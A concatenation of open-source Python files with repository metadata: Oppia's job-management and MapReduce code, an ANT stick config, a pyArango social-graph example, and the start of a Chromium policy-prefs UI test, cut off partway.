'Job %s started at %s' %
(job_id, utils.get_current_time_in_millisecs()))
cls.register_start(job_id)
try:
result = cls._run(additional_job_params)
except Exception as e:
logging.error(traceback.format_exc())
logging.error(
'Job %s failed at %s' %
(job_id, utils.get_current_time_in_millisecs()))
cls.register_failure(
job_id, '%s\n%s' % (unicode(e), traceback.format_exc()))
raise taskqueue_services.PermanentTaskFailure(
'Task failed: %s\n%s' % (unicode(e), traceback.format_exc()))
# Note that the job may have been canceled after it started and before
# it reached this stage. This will result in an exception when the
# validity of the status code transition is checked.
cls.register_completion(job_id, result)
logging.info(
'Job %s completed at %s' %
(job_id, utils.get_current_time_in_millisecs()))
@classmethod
def _real_enqueue(cls, job_id, additional_job_params):
"""Puts the job in the task queue.
Args:
- job_id: str, the id of the job.
- additional_job_params: dict of additional params to pass into the
job's _run() method.
"""
taskqueue_services.defer(cls._run_job, job_id, additional_job_params)
class MapReduceJobPipeline(base_handler.PipelineBase):
def run(self, job_id, job_class_str, kwargs):
job_class = mapreduce_util.for_name(job_class_str)
job_class.register_start(job_id, metadata={
job_class._OUTPUT_KEY_ROOT_PIPELINE_ID: self.root_pipeline_id
})
# TODO(sll): Need try/except/mark-as-canceled here?
output = yield mapreduce_pipeline.MapreducePipeline(**kwargs)
yield StoreMapReduceResults(job_id, job_class_str, output)
def finalized(self):
# Suppress the default Pipeline behavior of sending email.
# TODO(sll): Should mark-as-done be here instead?
pass
class StoreMapReduceResults(base_handler.PipelineBase):
def run(self, job_id, job_class_str, output):
job_class = mapreduce_util.for_name(job_class_str)
try:
iterator = input_readers.RecordsReader(output, 0)
results_list = []
for item in iterator:
# Map/reduce puts reducer output into blobstore files as a
# string obtained via "str(result)". Use AST as a safe
# alternative to eval() to get the Python object back.
results_list.append(ast.literal_eval(item))
job_class.register_completion(job_id, results_list)
except Exception as e:
logging.error(traceback.format_exc())
logging.error(
'Job %s failed at %s' %
(job_id, utils.get_current_time_in_millisecs()))
job_class.register_failure(
job_id,
'%s\n%s' % (unicode(e), traceback.format_exc()))
class BaseMapReduceJobManager(BaseJobManager):
# The output for this job is a list of individual results. Each item in
# the list will be of whatever type is yielded from the 'reduce' method.
#
# The 'metadata' field in the BaseJob representing a MapReduceJob
# is a dict with one key, _OUTPUT_KEY_ROOT_PIPELINE_ID. The corresponding
# value is a string representing the ID of the MapReduceJobPipeline
# as known to the mapreduce/lib/pipeline internals. This is used
# to generate URLs pointing at the pipeline support UI.
_OUTPUT_KEY_ROOT_PIPELINE_ID = 'root_pipeline_id'
@staticmethod
def get_mapper_param(param_name):
mapper_params = context.get().mapreduce_spec.mapper.params
if param_name not in mapper_params:
raise Exception(
'Could not find %s in %s' % (param_name, mapper_params))
return context.get().mapreduce_spec.mapper.params[param_name]
@classmethod
def entity_classes_to_map_over(cls):
"""Return a list of reference to the datastore classes to map over."""
raise NotImplementedError(
'Classes derived from BaseMapReduceJobManager must implement '
'entity_classes_to_map_over()')
@staticmethod
def map(item):
"""Implements the map function. Must be declared @staticmethod.
Args:
item: The parameter passed to this function is a single element of
the type given by entity_class(). This function may yield as many
times as appropriate (including zero) to return key/value 2-tuples.
For example, to get a count of all explorations, one might yield
(exploration.id, 1).
WARNING: The OutputWriter converts mapper output keys to type str.
So, if you have keys that are of type unicode, you must yield
"key.encode('utf-8')", rather than "key".
"""
raise NotImplementedError(
'Classes derived from BaseMapReduceJobManager must implement map '
'as a @staticmethod.')
@staticmethod
def reduce(key, values):
"""Implements the reduce function. Must be declared @staticmethod.
This function should yield whatever it likes; the recommended thing to
do is emit entities. All emitted outputs from all reducers will be
collected in an array and set into the output value for the job, so
don't pick anything huge. If you need something huge, persist it out
into the datastore instead and return a reference (and dereference it
later to load content as needed).
Args:
key: A key value as emitted from the map() function, above.
values: A list of all values from all mappers that were tagged with
the given key. This code can assume that it is the only process
handling values for this key. (It can probably also assume that
it will be called exactly once for each key with all of the output,
but this needs to be verified.)
"""
raise NotImplementedError(
'Classes derived from BaseMapReduceJobManager must implement '
'reduce as a @staticmethod.')
@classmethod
def _real_enqueue(cls, job_id, additional_job_params):
entity_class_types = cls.entity_classes_to_map_over()
entity_class_names = [
'%s.%s' % (
entity_class_type.__module__, entity_class_type.__name__)
for entity_class_type in entity_class_types]
kwargs = {
'job_name': job_id,
'mapper_spec': '%s.%s.map' % (cls.__module__, cls.__name__),
'reducer_spec': '%s.%s.reduce' % (cls.__module__, cls.__name__),
'input_reader_spec': (
'core.jobs.MultipleDatastoreEntitiesInputReader'),
'output_writer_spec': (
'mapreduce.output_writers.BlobstoreRecordsOutputWriter'),
'mapper_params': {
MAPPER_PARAM_KEY_ENTITY_KINDS: entity_class_names,
# Note that all parameters passed to the mapper need to be
# strings. Also note that the value for this key is determined
# just before enqueue time, so it will be roughly equal to the
# actual enqueue time.
MAPPER_PARAM_KEY_QUEUED_TIME_MSECS: str(
utils.get_current_time_in_millisecs()),
}
}
if additional_job_params is not None:
for param_name in additional_job_params:
if param_name in kwargs['mapper_params']:
raise Exception(
'Additional job param %s shadows an existing mapper '
'param' % param_name)
kwargs['mapper_params'][param_name] = copy.deepcopy(
additional_job_params[param_name])
mr_pipeline = MapReduceJobPipeline(
job_id, '%s.%s' % (cls.__module__, cls.__name__), kwargs)
mr_pipeline.start(base_path='/mapreduce/worker/pipeline')
@classmethod
def _pre_cancel_hook(cls, job_id, cancel_message):
metadata = cls.get_metadata(job_id)
root_pipeline_id = metadata[cls._OUTPUT_KEY_ROOT_PIPELINE_ID]
pipeline.Pipeline.from_id(root_pipeline_id).abort(cancel_message)
@staticmethod
def _entity_created_before_job_queued(entity):
"""Checks that the given entity was created before the MR job was queued.
Mapper methods may want to use this as a precomputation check,
especially if the datastore classes being iterated over are append-only
event logs.
"""
created_on_msec = utils.get_time_in_millisecs(entity.created_on)
job_queued_msec = float(context.get().mapreduce_spec.mapper.params[
MAPPER_PARAM_KEY_QUEUED_TIME_MSECS])
return job_queued_msec >= created_on_msec
class MultipleDatastoreEntitiesInputReader(input_readers.InputReader):
_ENTITY_KINDS_PARAM = 'entity_kinds'
_READER_LIST_PARAM = 'readers'
def __init__(self, reader_list):
self._reader_list = reader_list
def __iter__(self):
for reader in self._reader_list:
yield reader
@classmethod
def from_json(cls, input_shard_state):
return cls(input_readers.DatastoreInputReader.from_json(
input_shard_state[cls._READER_LIST_PARAM]))
def to_json(self):
return {
self._READER_LIST_PARAM: self._reader_list.to_json()
}
@classmethod
def split_input(cls, mapper_spec):
params = mapper_spec.params
entity_kinds = params.get(cls._ENTITY_KINDS_PARAM)
splits = []
for entity_kind in entity_kinds:
new_mapper_spec = copy.deepcopy(mapper_spec)
new_mapper_spec.params['entity_kind'] = entity_kind
splits.append(
input_readers.DatastoreInputReader.split_input(
new_mapper_spec))
inputs = []
for split in splits:
for item in split:
inputs.append(MultipleDatastoreEntitiesInputReader(item))
return inputs
@classmethod
def validate(cls, mapper_spec):
return True # TODO
class BaseMapReduceJobManagerForContinuousComputations(BaseMapReduceJobManager):
@classmethod
def _get_continuous_computation_class(cls):
"""Returns the ContinuousComputationManager class associated with this
MapReduce job.
"""
raise NotImplementedError(
'Subclasses of BaseMapReduceJobManagerForContinuousComputations '
'must implement the _get_continuous_computation_class() method.')
@staticmethod
def _get_job_queued_msec():
return float(context.get().mapreduce_spec.mapper.params[
MAPPER_PARAM_KEY_QUEUED_TIME_MSECS])
@staticmethod
def _entity_created_before_job_queued(entity):
"""Checks that the given entity was created before the MR job was queued.
Mapper methods may want to use this as a precomputation check,
especially if the datastore classes being iterated over are append-only
event logs.
"""
created_on_msec = utils.get_time_in_millisecs(entity.created_on)
job_queued_msec = float(context.get().mapreduce_spec.mapper.params[
MAPPER_PARAM_KEY_QUEUED_TIME_MSECS])
return job_queued_msec >= created_on_msec
@classmethod
def _post_completed_hook(cls, job_id):
cls._get_continuous_computation_class().on_batch_job_completion()
@classmethod
def _post_cancel_hook(cls, job_id, cancel_message):
cls._get_continuous_computation_class().on_batch_job_canceled()
@classmethod
def _post_failure_hook(cls, job_id):
cls._get_continuous_computation_class().on_batch_job_failure()
class BaseRealtimeDatastoreClassForContinuousComputations(
base_models.BaseModel):
"""Storage class for entities in the realtime layer.
Instances of this class represent individual entities that are stored in
the realtime datastore. Note that the realtime datastore may be formatted
differently from the datastores that are iterated over by the MapReduce
job.
The IDs for instances of this class are of the form 0:... or 1:..., where
the 0 or 1 indicates the realtime layer that the entity is in.
NOTE TO DEVELOPERS: Ensure that you wrap the id with get_realtime_id()
when doing creations, gets, puts and queries, in order to ensure that the
relevant layer prefix gets appended.
"""
realtime_layer = ndb.IntegerProperty(required=True, choices=[0, 1])
@classmethod
def get_realtime_id(cls, layer_index, raw_entity_id):
"""Returns an ID used to identify the element with the given entity id
in the currently active realtime datastore layer.
"""
return '%s:%s' % (layer_index, raw_entity_id)
@classmethod
def delete_layer(cls, layer_index, latest_created_on_datetime):
"""Deletes all entities in the given layer which were created before
the given datetime.
"""
query = cls.query().filter(cls.realtime_layer == layer_index).filter(
cls.created_on < latest_created_on_datetime)
ndb.delete_multi(query.iter(keys_only=True))
@classmethod
def _is_valid_realtime_id(cls, realtime_id):
return realtime_id.startswith('0:') or realtime_id.startswith('1:')
@classmethod
def get(cls, entity_id, strict=True):
if not cls._is_valid_realtime_id(entity_id):
raise ValueError('Invalid realtime id: %s' % entity_id)
return super(
BaseRealtimeDatastoreClassForContinuousComputations, cls
).get(entity_id, strict=strict)
def put(self):
if (self.realtime_layer is None or
str(self.realtime_layer) != self.id[0]):
raise Exception(
'Realtime layer %s does not match realtime id %s' %
(self.realtime_layer, self.id))
return super(
BaseRealtimeDatastoreClassForContinuousComputations, self).put()
class BaseContinuousComputationManager(object):
"""This class represents a manager for a continuously-running computation.
Such computations consist of two parts: a batch job to compute summary
views, and a realtime layer to augment these batch views with additional
data that has come in since the last batch job results were computed. The
realtime layer may provide only approximate results, but the discrepancy
should be small because the realtime layer is expected to handle a much
smaller amount of data than the batch layer.
The batch jobs are run continuously, with each batch job starting
immediately after the previous run has finished. There are two realtime
layers that are cleared alternatively after successive batch runs, just
before a new batch job is enqueued. Events are recorded to all three
layers.
Here is a schematic showing how this works. The x-axis represents the
progression of time. The arrowed intervals in the batch layer indicate how
long the corresponding batch job takes to run, and the intervals in each
realtime layer indicate spans between when the data in the realtime layer
is cleared. Note that a realtime layer is cleared as part of the post-
processing that happens when a batch job completes, which explains why the
termination of each batch interval and one of the realtime intervals
always coincides. Having two realtime layers allows the inactive layer to
be cleared whilst not affecting incoming queries to the active layer.
Batch layer <-----> <-------> <-------> <-------> <-------->
Realtime layer R0 <-----> <------------------> <------------------>
Realtime layer R1 <----------------> <-----------------> <------ ...
<-- A --> <-- B -->
For example, queries arising during the time interval A will use the
results of the first batch run, plus data from the realtime layer R1.
Queries arising during the time interval B will use the results of the
second batch run, plus data from the realtime layer R0.
"""
# TODO(sll): In the previous docstring, quantify what 'small' means
# once we have some experience with this running in production.
@classmethod
def get_event_types_listened_to(cls):
"""Returns a list of event types that this class subscribes to."""
raise NotImplementedError(
'Subclasses of BaseContinuousComputationManager must implement '
'get_event_types_listened_to(). This method should return a list '
'of strings, each representing an event type that this class '
'subscribes to.')
@classmethod
def _get_realtime_datastore_class(cls):
"""Returns the datastore class used by the realtime layer, which should
subclass BaseRealtimeDatastoreClassForContinuousComputations. See
StartExplorationRealtimeModel in core/jobs_test.py for an example
of how to do this.
"""
raise NotImplementedError(
'Subclasses of BaseContinuousComputationManager must implement '
'_get_realtime_datastore_class(). This method should return '
'the datastore class to be used by the realtime layer.')
@classmethod
def _get_batch_job_manager_class(cls):
"""Returns the manager class for the continuously-running batch job.
See jobs_test.py for an example of how to do this.
"""
raise NotImplementedError(
'Subclasses of BaseContinuousComputationManager must implement '
'_get_batch_job_manager_class(). This method should return the'
'manager class for the continuously-running batch job.')
@classmethod
def _handle_incoming_event(
cls, active_realtime_layer, event_type, *args, **kwargs):
"""Records incoming events in the given realtime layer.
This method should be implemented by subclasses. The args are the
same as those sent to the event handler corresponding to the event
type. Note that there may be more than one event type.
IMPORTANT: This method only gets called as part of the dequeue process
from a deferred task queue. Developers should expect a delay to occur
between when the incoming event arrives and when this method is called,
and should resolve any arguments that depend on local session
variables (such as the user currently in session) before enqueueing
this method in the corresponding event handler.
IMPORTANT: If an exception is raised here, the task queue will retry
calling it and any mutations made will be redone -- unless the
exception has type taskqueue_services.PermanentTaskFailure. Developers
should therefore ensure that _handle_incoming_event() is robust to
multiple calls for the same incoming event.
"""
raise NotImplementedError(
'Subclasses of BaseContinuousComputationManager must implement '
'_handle_incoming_event(...). Please check the docstring of this '
'method in jobs.BaseContinuousComputationManager for important '
'developer information.')
@classmethod
def _get_active_realtime_index(cls):
def _get_active_realtime_index_transactional():
cc_model = job_models.ContinuousComputationModel.get(
cls.__name__, strict=False)
if cc_model is None:
cc_model = job_models.ContinuousComputationModel(
id=cls.__name__)
cc_model.put()
return cc_model.active_realtime_layer_index
return transaction_services.run_in_transaction(
_get_active_realtime_index_transactional)
@classmethod
def get_active_realtime_layer_id(cls, entity_id):
"""Returns an ID used to identify the element with the given entity id
in the currently active realtime datastore layer.
"""
return cls._get_realtime_datastore_class().get_realtime_id(
cls._get_active_realtime_index(), entity_id)
@classmethod
def _switch_active_realtime_class(cls):
def _switch_active_realtime_class_transactional():
cc_model = job_models.ContinuousComputationModel.get(
cls.__name__)
cc_model.active_realtime_layer_index = (
1 - cc_model.active_realtime_layer_index)
cc_model.put()
transaction_services.run_in_transaction(
_switch_active_realtime_class_transactional)
@classmethod
def _clear_inactive_realtime_layer(
cls, latest_created_on_datetime):
"""Deletes all entries in the given realtime datastore class whose
created_on date is before latest_timestamp.
"""
inactive_realtime_index = 1 - cls._get_active_realtime_index()
cls._get_realtime_datastore_class().delete_layer(
inactive_realtime_index, latest_created_on_datetime)
@classmethod
def _kickoff_batch_job(cls):
"""Create and enqueue a new batch job."""
if job_models.JobModel.do_unfinished_jobs_exist(cls.__name__):
logging.error(
'Tried to start a new batch job of type %s while an existing '
'job was still running ' % cls.__name__)
return
job_manager = cls._get_batch_job_manager_class()
job_id = job_manager.create_new()
job_manager.enqueue(job_id)
@classmethod
def _register_end_of_batch_job_and_return_status(cls):
"""Processes a 'job finished' event and returns the job's updated status
code.
Note that 'finish' in this context might mean 'completed successfully'
or 'failed'.
Processing means the following: if the job is currently 'stopping', its
status is set to 'idle'; otherwise, its status remains as 'running'.
"""
def _register_end_of_batch_job_transactional():
"""Transactionally change the computation's status when a batch job
ends."""
cc_model = job_models.ContinuousComputationModel.get(cls.__name__)
if (cc_model.status_code ==
job_models.CONTINUOUS_COMPUTATION_STATUS_CODE_STOPPING):
cc_model.status_code = (
job_models.CONTINUOUS_COMPUTATION_STATUS_CODE_IDLE)
cc_model.put()
return cc_model.status_code
return transaction_services.run_in_transaction(
_register_end_of_batch_job_transactional)
@classmethod
def get_status_code(cls):
"""Returns the status code of the job."""
return job_models.ContinuousComputationModel.get(
cls.__name__).status_code
@classmethod
def start_computation(cls):
"""(Re)starts the continuous computation corresponding to this class.
Raises an Exception if the computation is already running.
"""
def _start_computation_transactional():
"""Transactional implementation for marking a continuous
computation as started.
"""
cc_model = job_models.ContinuousComputationModel.get(
cls.__name__, strict=False)
if cc_model is None:
cc_model = job_models.ContinuousComputationModel(
id=cls.__name__)
if (cc_model.status_code !=
job_models.CONTINUOUS_COMPUTATION_STATUS_CODE_IDLE):
raise Exception(
'Attempted to start computation %s, which is already '
'running.' % cls.__name__)
cc_model.status_code = (
job_models.CONTINUOUS_COMPUTATION_STATUS_CODE_RUNNING)
cc_model.last_started_msec = utils.get_current_time_in_millisecs()
cc_model.put()
transaction_services.run_in_transaction(
_start_computation_transactional)
cls._clear_inactive_realtime_layer(datetime.datetime.utcnow())
cls._kickoff_batch_job()
@classmethod
def stop_computation(cls, user_id, test_mode=False):
"""Cancels the currently-running batch job.
No further batch runs will be kicked off.
"""
# This is not an ancestor query, so it must be run outside a
# transaction.
do_unfinished_jobs_exist = (
job_models.JobModel.do_unfinished_jobs_exist(
cls._get_batch_job_manager_class().__name__))
def _stop_computation_transactional():
"""Transactional implementation for marking a continuous
computation as stopping/idle.
"""
cc_model = job_models.ContinuousComputationModel.get(cls.__name__)
# If there is no job currently running, go to IDLE immediately.
new_status_code = (
job_models.CONTINUOUS_COMPUTATION_STATUS_CODE_STOPPING if
do_unfinished_jobs_exist else
job_models.CONTINUOUS_COMPUTATION_STATUS_CODE_IDLE)
cc_model.status_code = new_status_code
cc_model.last_stopped_msec = utils.get_current_time_in_millisecs()
cc_model.put()
transaction_services.run_in_transaction(
_stop_computation_transactional)
# The cancellation must be done after the continuous computation
# status update.
if do_unfinished_jobs_exist:
unfinished_job_models = job_models.JobModel.get_unfinished_jobs(
cls._get_batch_job_manager_class().__name__)
for job_model in unfinished_job_models:
cls._get_batch_job_manager_class().cancel(
job_model.id, user_id)
@classmethod
def on_incoming_event(cls, event_type, *args, **kwargs):
"""Handle an incoming event by recording it in both realtime datastore
layers.
The *args and **kwargs match those passed to the _handle_event() method
of the corresponding EventHandler subclass.
"""
REALTIME_LAYERS = [0, 1]
for layer in REALTIME_LAYERS:
cls._handle_incoming_event(layer, event_type, *args, **kwargs)
@classmethod
def _process_job_completion_and_return_status(cls):
"""Delete all data in the currently-active realtime_datastore class,
switch the active class, and return the status.
This seam was created so that tests would be able to override
on_batch_job_completion() to avoid kicking off the next job
immediately.
"""
cls._switch_active_realtime_class()
cls._clear_inactive_realtime_layer(datetime.datetime.utcnow())
def _update_last_finished_time_transactional():
cc_model = job_models.ContinuousComputationModel.get(cls.__name__)
cc_model.last_finished_msec = utils.get_current_time_in_millisecs()
cc_model.put()
transaction_services.run_in_transaction(
_update_last_finished_time_transactional)
return cls._register_end_of_batch_job_and_return_status()
@classmethod
def _kickoff_batch_job_after_previous_one_ends(cls):
"""Seam that can be overridden by tests."""
cls._kickoff_batch_job()
@classmethod
def on_batch_job_completion(cls):
"""Called when a batch job completes."""
job_status = cls._process_job_completion_and_return_status()
if job_status == job_models.CONTINUOUS_COMPUTATION_STATUS_CODE_RUNNING:
cls._kickoff_batch_job_after_previous_one_ends()
@classmethod
def on_batch_job_canceled(cls):
logging.info('Job %s canceled.' % cls.__name__)
# The job should already be stopping, and should therefore be marked
# idle.
job_status = cls._register_end_of_batch_job_and_return_status()
if job_status != job_models.CONTINUOUS_COMPUTATION_STATUS_CODE_IDLE:
logging.error(
'Batch job for computation %s canceled but status code not set '
'to idle.' % cls.__name__)
@classmethod
def on_batch_job_failure(cls):
# TODO(sll): Alert the site admin via email.
logging.error('Job %s failed.' % cls.__name__)
job_status = cls._register_end_of_batch_job_and_return_status()
if job_status == job_models.CONTINUOUS_COMPUTATION_STATUS_CODE_RUNNING:
cls._kickoff_batch_job_after_previous_one_ends()
def _get_job_dict_from_job_model(model):
"""Converts an ndb.Model representing a job to a dict.
The dict contains the following keys:
- 'id': the job id
- 'time_started_msec': when the job was started, in milliseconds since the
epoch
- 'time_finished_msec': when the job was finished, in milliseconds since
the epoch
- 'status_code': the current status of the job
- 'job_type': the type of this job
- 'is_cancelable': whether the job can be canceled
- 'error': any errors pertaining to this job
- 'human_readable_time_started': a human-readable string representing the
time the job started, or None if time_started_msec is None.
- 'human_readable_time_finished': a human-readable string representing the
time the job finished, or None if time_finished_msec is None.
"""
return {
'id': model.id,
'time_started_msec': model.time_started_msec,
'time_finished_msec': model.time_finished_msec,
'status_code': model.status_code,
'job_type': model.job_type,
'is_cancelable': model.is_cancelable,
'error': model.error,
'human_readable_time_started': (
'' if model.time_started_msec is None
else utils.get_human_readable_time_string(model.time_started_msec)),
'human_readable_time_finished': (
'' if model.time_finished_msec is None
else utils.get_human_readable_time_string(
model.time_finished_msec)),
}
def get_data_for_recent_jobs(recency_msec=DEFAULT_RECENCY_MSEC):
"""Get a list containing data about recent jobs.
This list is arranged in descending order based on the time the job
was enqueued. At most NUM_JOBS_IN_DASHBOARD_LIMIT job descriptions are
returned.
Args:
- recency_secs: the threshold for a recent job, in seconds.
"""
recent_job_models = job_models.JobModel.get_recent_jobs(
NUM_JOBS_IN_DASHBOARD_LIMIT, recency_msec)
return [_get_job_dict_from_job_model(model) for model in recent_job_models]
def get_data_for_unfinished_jobs():
"""Get a list containing data about all unfinished jobs."""
unfinished_job_models = job_models.JobModel.get_all_unfinished_jobs(
NUM_JOBS_IN_DASHBOARD_LIMIT)
return [_get_job_dict_from_job_model(model)
for model in unfinished_job_models]
def get_job_output(job_id):
"""Returns the output of a job."""
return job_models.JobModel.get_by_id(job_id).output
def get_continuous_computations_info(cc_classes):
"""Returns data about the given computations.
Args:
cc_classes: a list of subclasses of BaseContinuousComputationManager.
Returns:
A list of dicts, each representing a continuous computation. Each dict
has the following keys:
- 'computation_type': the type of the computation
- 'status_code': the current status of the computation
- 'last_started_msec': when a batch job for the computation was last
started, in milliseconds since the epoch
- 'last_finished_msec': when a batch job for the computation last
finished, in milliseconds since the epoch
- 'last_stopped_msec': when a batch job for the computation was last
stopped, in milliseconds since the epoch
- 'active_realtime_layer_index': the index of the active realtime layer
- 'is_startable': whether an admin should be allowed to start this
computation
- 'is_stoppable': whether an admin should be allowed to stop this
computation
"""
cc_models = job_models.ContinuousComputationModel.get_multi(
[cc_class.__name__ for cc_class in cc_classes])
result = []
for ind, model in enumerate(cc_models):
if model is None:
cc_dict = {
'computation_type': cc_classes[ind].__name__,
'status_code': 'never_started',
'last_started_msec': None,
'last_finished_msec': None,
'last_stopped_msec': None,
'active_realtime_layer_index': None,
'is_startable': True,
'is_stoppable': False,
}
else:
cc_dict = {
'computation_type': cc_classes[ind].__name__,
'status_code': model.status_code,
'last_started_msec': model.last_started_msec,
'last_finished_msec': model.last_finished_msec,
'last_stopped_msec': model.last_stopped_msec,
'active_realtime_layer_index': (
model.active_realtime_layer_index),
# TODO(sll): If a job is stopping, can it be started while it
# is in the process of stopping?
'is_startable': model.status_code == (
job_models.CONTINUOUS_COMPUTATION_STATUS_CODE_IDLE),
'is_stoppable': model.status_code == (
job_models.CONTINUOUS_COMPUTATION_STATUS_CODE_RUNNING),
}
result.append(cc_dict)
return result
def get_stuck_jobs(recency_msecs):
"""Returns a list of jobs which were last updated at most recency_msecs
milliseconds ago and have experienced more than one retry."""
threshold_time = (
datetime.datetime.utcnow() -
datetime.timedelta(0, 0, 0, recency_msecs))
shard_state_model_class = mapreduce_model.ShardState
# TODO(sll): Clean up old jobs so that this query does not have to iterate
# over so many elements in a full table scan.
recent_job_models = shard_state_model_class.all()
stuck_jobs = []
for job_model in recent_job_models:
if job_model.update_time > threshold_time and job_model.retries > 0:
stuck_jobs.append(job_model)
return stuck_jobs
class JobCleanupManager(BaseMapReduceJobManager):
"""One-off job for cleaning up old auxiliary entities for MR jobs."""
@classmethod
def entity_classes_to_map_over(cls):
return [
mapreduce_model.MapreduceState,
mapreduce_model.ShardState
]
@staticmethod
def map(item):
max_start_time_msec = JobCleanupManager.get_mapper_param(
MAPPER_PARAM_MAX_START_TIME_MSEC)
if isinstance(item, mapreduce_model.MapreduceState):
if (item.result_status == 'success' and
utils.get_time_in_millisecs(item.start_time) <
max_start_time_msec):
item.delete()
yield ('mr_state_deleted', 1)
else:
yield ('mr_state_remaining', 1)
if isinstance(item, mapreduce_model.ShardState):
if (item.result_status == 'success' and
utils.get_time_in_millisecs(item.update_time) <
max_start_time_msec):
item.delete()
yield ('shard_state_deleted', 1)
else:
yield ('shard_state_remaining', 1)
@staticmethod
def reduce(key, stringified_values):
values = [ast.literal_eval(v) for v in stringified_values]
if key.endswith('_deleted'):
logging.warning(
'Delete count: %s entities (%s)' % (sum(values), key))
else:
logging.warning(
'Entities remaining count: %s entities (%s)' %
(sum(values), key))
ABSTRACT_BASE_CLASSES = frozenset([
BaseJobManager, BaseDeferredJobManager, BaseMapReduceJobManager,
BaseMapReduceJobManagerForContinuousComputations])
| {
"content_hash": "4a669e77d4f37b1e699265f988817a26",
"timestamp": "",
"source": "github",
"line_count": 1188,
"max_line_length": 81,
"avg_line_length": 40.19191919191919,
"alnum_prop": 0.6383932311300997,
"repo_name": "wangsai/oppia",
"id": "0b48a1be644d5cc27e7da4b9ad90c50d4a7f39c5",
"size": "48371",
"binary": false,
"copies": "9",
"ref": "refs/heads/master",
"path": "core/jobs.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "363"
},
{
"name": "CSS",
"bytes": "44925"
},
{
"name": "HTML",
"bytes": "256657"
},
{
"name": "JavaScript",
"bytes": "1264158"
},
{
"name": "Python",
"bytes": "1421858"
},
{
"name": "Shell",
"bytes": "24808"
}
],
"symlink_target": ""
} |
from ant.core import log
# USB1 ANT stick interface. Running `dmesg | tail -n 25` after plugging the
# stick on a USB port should tell you the exact interface.
SERIAL = '/dev/ttyUSB0'
# If set to True, the stick's driver will dump everything it reads/writes
# from/to the stick.
DEBUG = False
# Set to None to disable logging
LOG = None
#LOG = log.LogWriter()
# ========== DO NOT CHANGE ANYTHING BELOW THIS LINE ==========
if LOG is not None:
print "Using log file:", LOG.filename
print ""
| {
"content_hash": "a6a65c3700a7bd2ce598aa80e4d8ae37",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 75,
"avg_line_length": 27.555555555555557,
"alnum_prop": 0.6935483870967742,
"repo_name": "nputikhin/simple-ant-hrm",
"id": "a17868cfc96d691fea21d2fc6d5c72a45d73e5bf",
"size": "496",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "SimpleHRMClient/config.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "10884"
}
],
"symlink_target": ""
} |
import sys
from pyArango.connection import *
from pyArango.graph import *
from pyArango.collection import *
class Social(object):
class male(Collection):
_fields = {
"name" : Field()
}
class female(Collection):
_fields = {
"name" : Field()
}
class relation(Edges):
_fields = {
"number" : Field()
}
class social(Graph):
_edgeDefinitions = (EdgeDefinition ('relation',
fromCollections = ["female", "male"],
toCollections = ["female", "male"]),)
_orphanedCollections = []
def __init__(self):
self.conn = Connection(username="USERNAME", password="SECRET")
self.db = self.conn["_system"]
if self.db.hasGraph('social'):
raise Exception("The social graph was already provisioned! remove it first")
self.female = self.db.createCollection('Collection', "female")
self.male = self.db.createCollection('Collection', "male")
self.relation = self.db.createCollection('Edges', "relation")
g = self.db.createGraph("social")
a = g.createVertex('female', {"name": 'Alice', "_key": 'alice'});
b = g.createVertex('male', {"name": 'Bob', "_key": 'bob'});
c = g.createVertex('male', {"name": 'Charly', "_key": 'charly'});
d = g.createVertex('female', {"name": 'Diana', "_key": 'diana'});
a.save()
b.save()
c.save()
d.save()
g.link('relation', a, b, {"type": 'married', "_key": 'aliceAndBob'})
g.link('relation', a, c, {"type": 'friend', "_key": 'aliceAndCharly'})
g.link('relation', c, d, {"type": 'married', "_key": 'charlyAndDiana'})
g.link('relation', b, d, {"type": 'friend', "_key": 'bobAndDiana'})
Social()
| {
"content_hash": "65b8686e93555343a727bb111887ece3",
"timestamp": "",
"source": "github",
"line_count": 60,
"max_line_length": 95,
"avg_line_length": 36.583333333333336,
"alnum_prop": 0.45011389521640094,
"repo_name": "tariqdaouda/pyArango",
"id": "739a863a14040ce4875bcc7b395ed323b1e14af7",
"size": "2213",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "examples/createSocialGraph.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "6714"
},
{
"name": "Makefile",
"bytes": "6779"
},
{
"name": "Python",
"bytes": "139623"
},
{
"name": "Shell",
"bytes": "492"
}
],
"symlink_target": ""
} |
import logging
import pyauto_functional # must come before pyauto.
import policy_base
import pyauto
from policy_test_cases import PolicyPrefsTestCases
class PolicyPrefsUITest(policy_base.PolicyTestBase):
"""Tests user policies and their impact on the prefs UI."""
settings_pages = [
'chrome://settings-frame',
'chrome://settings-frame/searchEngines',
'chrome://settings-frame/passwords',
'chrome://settings-frame/autofill',
'chrome://settings-frame/content',
'chrome://settings-frame/homePageOverlay',
'chrome://settings-frame/languages',
]
if pyauto.PyUITest.IsChromeOS():
settings_pages += [
'chrome://settings-frame/accounts',
]
def setUp(self):
policy_base.PolicyTestBase.setUp(self)
if self.IsChromeOS():
self.LoginWithTestAccount()
def IsAnyBannerVisible(self):
"""Returns true if any banner (e.g. for managed prefs) is visible."""
ret = self.ExecuteJavascript("""
var visible = false;
var banners = document.querySelectorAll('.page-banner');
for (var i=0; i<banners.length; i++) {
if (banners[i].parentElement.id == 'templates')
continue;
if (window.getComputedStyle(banners[i]).display != 'none')
visible = true;
}
domAutomationController.send(visible.toString());
""")
return ret == 'true'
def testNoUserPoliciesNoBanner(self):
"""Verifies the banner isn't present when no user policies are in place."""
self.SetUserPolicy({})
for page in PolicyPrefsUITest.settings_pages:
self.NavigateToURL(page)
self.assertFalse(self.IsAnyBannerVisible(), msg=
'Unexpected banner in %s.\n'
'Please check that chrome/test/functional/policy_prefs_ui.py has an '
'entry for any new policies introduced.' % page)
def RunUserPoliciesShowBanner(self, include_expected, include_unexpected):
"""Tests all the user policies on each settings page.
If |include_expected|, pages where the banner is expected will be verified.
If |include_unexpected|, pages where the banner should not appear will also
be verified. This can take some time.
"""
os = self.GetPlatform()
all_policies = self.GetPolicyDefinitionList()
for policy, policy_test in PolicyPrefsTestCases.policies.iteritems():
# Skip device policies
if policy in all_policies and all_policies[policy][1]:
continue
if os not in policy_test[PolicyPrefsTestCases.INDEX_OS]:
continue
expected_pages = [PolicyPrefsUITest.settings_pages[n]
for n in policy_test[PolicyPrefsTestCases.INDEX_PAGES]]
did_test = False
for page in PolicyPrefsUITest.settings_pages:
expected = page in expected_pages
if expected and not include_expected:
